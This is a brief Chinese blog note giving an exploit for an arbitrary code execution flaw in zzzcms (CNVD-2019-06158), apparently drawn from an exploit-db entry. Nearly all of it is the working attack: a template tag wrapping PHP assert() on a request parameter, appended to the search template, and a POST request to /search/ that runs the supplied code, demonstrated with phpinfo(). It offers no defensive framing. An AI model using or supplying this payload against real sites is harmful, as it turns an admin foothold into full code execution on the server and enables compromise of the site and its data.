【笔记】zzzcms任意代码执行漏洞利用

发表于 更新于 阅读次数:

前言

zzzcms任意代码执行漏洞利用
CNVD-2019-06158
https://expolit-db.com/exploits/46454

漏洞利用前提

  • 已经登录管理员后台

exp

  1. 在搜索文件末尾追加{if:assert($_REQUEST['x'])}phpinfo();{end if}

  2. 在搜索时传递参数

request
1
2
3
4
POST /search/
Content-Type: application/x-www-form-urlencoded

x=phpinfo()

完成